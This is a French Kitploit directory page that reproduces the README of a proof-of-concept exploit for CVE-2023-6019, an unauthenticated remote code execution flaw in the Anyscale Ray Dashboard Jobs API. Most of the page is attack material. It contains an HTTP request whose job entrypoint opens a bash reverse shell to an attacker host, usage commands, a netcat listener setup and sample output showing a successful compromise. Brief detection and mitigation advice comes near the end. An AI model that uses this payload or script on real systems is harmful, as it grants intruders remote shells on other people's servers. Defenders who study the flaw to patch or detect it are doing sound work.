Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-6019 — Exploit PoC pour CVE-2023-6019 ciblant l'exécution de code à distance non authentifiée dans Anyscale Ray Dashboard via l'API Jobs. Fournit un shell inversé sur les instances Ray vulnérables (< 2.6.4). | Kitploit
Outils/GitHubGitHub/joaquinrrr/cve-2023-6019
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleOutil d'Accès à Distance
GitHubjoaquinrrr/cve-2023-6019

CVE-2023-6019

Exploit PoC pour CVE-2023-6019 ciblant l'exécution de code à distance non authentifiée dans Anyscale Ray Dashboard via l'API Jobs. Fournit un shell inversé sur les instances Ray vulnérables (< 2.6.4).

Voir le dépôt
611il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-6019 - Anyscale Ray Dashboard RCE non authentifié

PoC d'exploit pour CVE-2023-6019 — Exécution de code à distance via l'API Jobs non authentifiée de Ray Dashboard.
Réalisé par oguiii


Description

Anyscale Ray est un framework open-source pour les charges de travail d’IA/ML distribuées. Les versions antérieures à 2.6.4 exposent une API de soumission de Jobs via le tableau de bord Ray (port par défaut 8265) sans aucune authentification, permettant à un attaquant non authentifié de soumettre des tâches arbitraires et d’obtenir une exécution de code à distance sur l’hôte.

  • CVE : CVE-2023-6019
  • Sévérité : Critique (CVSS 9.8)
  • Versions concernées : Ray < 2.6.4
  • Corrigé dans : Ray 2.6.4
  • Vecteur d’attaque : Réseau (requête HTTP non authentifiée)

Comment ça fonctionne

Le point de terminaison /api/jobs/ accepte une charge utile JSON avec un champ entrypoint qui est exécuté comme une commande shell par le processus worker Ray – aucune identification requise.

root@kitploit:~
POST /api/jobs/ HTTP/1.1
Host: <cible>:8265
Content-Type: application/json

{
  "entrypoint": "bash -c 'bash -i >& /dev/tcp/ATTAQUANT/PORT 0>&1'",
  "runtime_env": {},
  "job_id": null,
  "metadata": {}
}

Utilisation

root@kitploit:~
git clone https://github.com/joaquinrrr/CVE-2023-6019
cd CVE-2023-6019
pip install requests
python3 CVE-2023-6019.py -t <IP_CIBLE> -p <PORT> -l <LHOST> -lp <LPORT>

Arguments

OptionDescriptionDéfaut
-tIP ou nom d’hôte de la ciblerequis
-pPort du tableau de bord Ray8265
-lIP de l’attaquant (reverse shell)requis
-lpPort de l’attaquant (reverse shell)requis

Exemple

root@kitploit:~
# Démarrer l’écouteur
nc -lvnp 4444

# Lancer l’exploit
python3 CVE-2023-6019.py -t 192.168.1.100 -p 8265 -l 192.168.1.10 -lp 4444

Sortie attendue

root@kitploit:~
[*] Vérification de la version Ray sur 192.168.1.100:8265...
[*] Version de l’API Ray : 4
[*] Version Ray     : 2.6.3
[+] VULNÉRABLE ! Ray 2.6.3 est affecté par CVE-2023-6019

[*] Cible        : http://192.168.1.100:8265/api/jobs/
[*] Reverse shell : 192.168.1.10:4444
[*] Soumission de la tâche...

[+] Tâche soumise avec succès !
[+] ID de la tâche : raysubmit_Gztg89LZuTa8Jevc

[>] Assurez-vous que votre écouteur est prêt :
    nc -lvnp 4444

Détection

Recherchez les requêtes POST non attendues vers /api/jobs/ sur le port 8265 dans vos journaux HTTP ou le trafic réseau.


Atténuation

  • Mettez à niveau vers Ray >= 2.6.4
  • Restreignez l’accès au port du tableau de bord Ray (8265) via des règles de pare-feu
  • N’exposez pas le tableau de bord Ray sur les réseaux publics

Références

  • https://nvd.nist.gov/vuln/detail/CVE-2023-6019
  • https://www.anyscale.com/
  • https://github.com/ray-project/ray

Avertissement

Cet outil est destiné uniquement aux tests de pénétration autorisés et à des fins éducatives.
L’auteur n’est pas responsable de toute utilisation abusive ou des dommages causés par cet outil.
Obtenez toujours une autorisation écrite appropriée avant de tester.

Télécharger l’outil